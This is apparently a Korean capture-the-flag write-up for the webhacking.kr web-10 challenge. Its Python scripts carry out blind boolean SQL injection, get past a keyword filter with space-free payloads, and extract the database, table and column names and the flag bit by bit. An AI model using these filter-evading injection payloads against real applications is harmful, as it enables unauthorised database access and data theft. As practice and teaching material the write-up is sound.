때려박으란다
필터링 : | = %20 like group * 0x char WHERE
0 넣어보자 → 아무 일도 안생김
1 넣어보면 결과가 나오긴 한다. 이걸 참값으로 하고, 나머지를 거짓 값으로 해서 쿼리를 날려야겠다.
이제 DB 이름의 길이를 찾아야 하는데, = 와 like 가 필터링 당하니까, in 을 활용했다.
def length_finder(search_max):
    # Boolean-oracle length probe (first version from the write-up).
    # For i = 1 .. search_max-1 (search_max itself is never tried) it asks the
    # server whether length(database()) is in (i), using in() because "=" and
    # "like" are on the filter list described above.
    # `true`, `false`, `requests`, `URL` and `cookie` are module-level names
    # defined in the full script later on the page, not in this snippet.
    # Returns the matching length; falls off the end and returns None when no
    # i matched (the later version replaces that with an explicit message + exit).
    for i in range(1,search_max):
        print("LOOKING FOR LENGTH : "+str(i))
        #find db name length
        pay = "?no=(0)or((length(database()))in("+str(i)+"))"
        res = requests.get(url=URL+pay,cookies=cookie)
        if true in res.text:
            # NOTE: label says PASSWORD, but this probe measures the db-name length.
            print("PASSWORD LENGTH : "+str(i))
            return i
        elif false in res.text:
            print("--> false")
            continue
        elif "hack" in res.text:
            # response produced by the server-side keyword filter; the loop just
            # moves on to the next i without recording anything
            print("filtered")
        else:
            # neither oracle marker nor filter message: dump the body for inspection
            print(res.text)
이제 값을 찾아주면
def word_finder(length):
    # Recovers database() one character at a time using the same boolean oracle.
    # For position i, eight requests (j = 1..8) each test a single bit of
    # lpad(bin(ord(<char>)),8,0); the bits are concatenated into `word` and
    # decoded with int(..., 2) -> chr(). Assumes every character's code fits in
    # 8 bits (ASCII) — anything wider would not survive the 8-wide lpad; TODO confirm.
    # Relies on the module-level `true`, `false`, `requests`, `URL`, `cookie`.
    # NOTE: the original indentation was lost in the paste; the final progress
    # print is placed at the per-character level here — confirm against the source.
    flag = ""
    for i in range(1,length+1):
        word =""
        print("FINDING PW of : "+str(i))
        for j in range(1,9):
            print("SEARCHING for "+str(j),end="\r")
            pay = "?no=(0)or((substr(lpad(bin(ord(substr(database(),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))"
            res = requests.get(url=URL+pay,cookies=cookie)
            if true in res.text:
                word +="1"
                continue
            elif false in res.text:
                word +="0"
                continue
            else:
                # any response that carries neither marker aborts the whole run
                # (exit() is the site-module helper, not sys.exit())
                print("\nSOMETHING's WRONG")
                print("\n",res.text)
                exit()
        # int() accepts the "0b" prefix when base 2 is given
        print("\n","word : "+chr(int("0b"+word,2)))
        flag += chr(int("0b"+word,2))
        print("\n",flag)
이정도면 뭐 양식이 정해져 있는거 같은 모습이다.
근데 공백 못쓰니까 쿼리가 너무 복잡해져서 실수가 많이 나온다.
def length_finder(search_max):
    # Second version: measures the LENGTH of the first (MIN) table name in the
    # current schema, taken from INFORMATION_SCHEMA.TABLES. The boolean result
    # is now passed directly as the `no` value instead of being OR-ed with (0).
    # The probe starts at 10, so lengths 1..9 are never tested.
    # `true`, `false`, `requests`, `URL`, `cookie` come from the full script below.
    # Returns the matching length, otherwise prints a message and exits the process.
    for i in range(10,search_max):
        print("LOOKING FOR LENGTH : "+str(i))
        #find the length of the first table name (comment inherited from the db-name version)
        pay = "?no=LENGTH((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)))IN("+str(i)+")"
        res = requests.get(url=URL+pay,cookies=cookie)
        if true in res.text:
            # NOTE: label says PASSWORD, but this is the table-name length.
            print("PASSWORD LENGTH : "+str(i))
            return i
        elif false in res.text:
            print("--> false")
            continue
        elif "hack" in res.text:
            # server-side keyword filter hit; continue with the next i
            print("filtered")
        else:
            # unexpected body: show it and stop (exit() is the site-module helper)
            print(res.text)
            exit()
    print("LENGTH NOT FOUND")
    exit()
def word_finder(length):
    # Same bit-by-bit extraction as before, but the inner substr() now reads
    # from the first table name in the current schema rather than database().
    # Eight requests per character (j = 1..8), one bit each; assumes 8-bit
    # characters — TODO confirm for non-ASCII names.
    # NOTE: original indentation was lost in the paste; the final print is
    # placed at the per-character level — confirm against the source.
    flag = ""
    for i in range(1,length+1):
        word =""
        print("FINDING PW of : "+str(i))
        for j in range(1,9):
            print("SEARCHING for "+str(j),end="\r")
            pay = "?no=(0)or((substr(lpad(bin(ord(substr((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))"
            res = requests.get(url=URL+pay,cookies=cookie)
            if true in res.text:
                word +="1"
                continue
            elif false in res.text:
                word +="0"
                continue
            else:
                # neither oracle marker present: abort the run
                print("\nSOMETHING's WRONG")
                print("\n",res.text)
                exit()
        print("\n","word : "+chr(int("0b"+word,2)))
        flag += chr(int("0b"+word,2))
        print("\n","STRING VALUE : "+flag)
암튼 뭐 설명은 여기까지 똑같은거 반복이다.
전체 자동화 코드 넣어놨다.
import requests
import os
# `cls` is the Windows console clear; on other platforms this presumably just
# shells out to a command that does not exist.
os.system("cls")
print("------------AUTO EXPLOIT------------")
# Challenge endpoint and the author's session cookie (value redacted on the page).
URL = "https://webhacking.kr/challenge/web-10/"
cookie = {"PHPSESSID": "<--REDACTED-->"}
# Boolean oracle: the page renders the query result cell as 1 or 0. These are
# plain module-level strings named in lowercase — not Python's True/False.
true= "result</td></tr><tr><td>1</td>"
false ="result</td></tr><tr><td>0</td>"
# Each stage is a single space-free SQL expression (the filter described at the
# top of the page blocks %20, =, like, WHERE, ...) that evaluates to one string.
# Each later query nests the previous one, so a table name depends on the
# db-name query and a column name on the table-name query.
DBNAME_query = "database()"
TABLENAME_query = "(SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN("+DBNAME_query+")),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES))"
COLUMNNAME_query = "(SELECT(MIN(IF((SELECT(TABLE_NAME)IN("+TABLENAME_query+")),COLUMN_NAME,NULL)))FROM(INFORMATION_SCHEMA.COLUMNS))"
# Final stage: the concrete table/column names, presumably filled in after the
# previous stages were run (see the commented-out calls in __main__).
DATA_query = "(SELECT(MIN(flag_3a55b31d))FROM(flag_ab733768))"
def length_finder(search_max,query):
    """Probe the server for LENGTH(query) via the boolean oracle.

    Tries i = 1 .. search_max-1 (search_max itself is excluded) and sends
    ``?no=LENGTH(<query>)IN(i)``; the page's 1/0 result cell (``true``/``false``
    markers at module level) tells which i matched.

    Args:
        search_max: exclusive upper bound for the probed length.
        query: a space-free SQL expression yielding one string (see the
            *_query constants at module level).

    Returns:
        The matching length. If nothing matched, prints ``LENGTH NOT FOUND``
        and exits the process instead of returning.
    """
    for i in range(1,search_max):
        print("LOOKING FOR LENGTH : "+str(i))
        #find the length of whatever `query` evaluates to (comment inherited from the db-name version)
        pay = "?no=LENGTH("+query+")IN("+str(i)+")"
        res = requests.get(url=URL+pay,cookies=cookie)
        if true in res.text:
            # NOTE: label says PASSWORD regardless of which query is being measured.
            print("PASSWORD LENGTH : "+str(i))
            return i
        elif false in res.text:
            print("--> false")
            continue
        elif "hack" in res.text:
            # server-side keyword filter hit; keep going with the next i
            print("filtered")
        else:
            # unexpected body: show it and stop (exit() is the site-module helper, not sys.exit())
            print(res.text)
            exit()
    print("LENGTH NOT FOUND")
    exit()
def word_finder(length,query):
    """Recover the string value of ``query`` one character at a time.

    For each position i (1..length) eight requests are sent, one per bit of
    ``lpad(bin(ord(substr(query,i,1))),8,0)``; each answer is appended to
    ``word`` and the byte is decoded with ``int(..., 2)`` -> ``chr()``.
    Assumes every character fits in 8 bits (ASCII) — TODO confirm.

    Args:
        length: number of characters to recover (from ``length_finder``).
        query: space-free SQL expression yielding one string.

    Returns:
        None; the recovered text is only printed. Any response that carries
        neither oracle marker aborts the process via ``exit()``.

    Server-side view: this produces bursts of 8 GET requests per character to
    the same path, differing only in the two small integers inside ``no`` —
    the observable pattern of a blind boolean extraction. The keyword blocklist
    described at the top of the page did not prevent it; parameterised queries
    are the fix on the application side.
    """
    flag = ""
    for i in range(1,length+1):
        word =""
        print("FINDING PW of : "+str(i))
        for j in range(1,9):
            print("SEARCHING for "+str(j),end="\r")
            pay = "?no=(0)or((substr(lpad(bin(ord(substr("+query+","+str(i)+",1))),8,0),"+str(j)+",1))in(1))"
            res = requests.get(url=URL+pay,cookies=cookie)
            if true in res.text:
                word +="1"
                continue
            elif false in res.text:
                word +="0"
                continue
            else:
                # neither marker present: dump the body and abort the run
                print("\nSOMETHING's WRONG")
                print("\n",res.text)
                exit()
        # int() accepts the "0b" prefix when base 2 is given
        print("\n","word : "+chr(int("0b"+word,2)))
        flag += chr(int("0b"+word,2))
        # NOTE: original indentation was lost in the paste; this running print is
        # placed at the per-character level — confirm against the source.
        print("\n","STRING VALUE : "+flag)
if __name__ == "__main__":
    # Stages run in order db name -> table name -> column name -> data; each
    # call first measures the length, then extracts the characters. The first
    # three are commented out, presumably after their results were hard-coded
    # into DATA_query above.
    #word_finder(length_finder(20,DBNAME_query),DBNAME_query)
    #word_finder(length_finder(20,TABLENAME_query),TABLENAME_query)
    #word_finder(length_finder(20,COLUMNNAME_query),COLUMNNAME_query)
    word_finder(length_finder(30,DATA_query),DATA_query)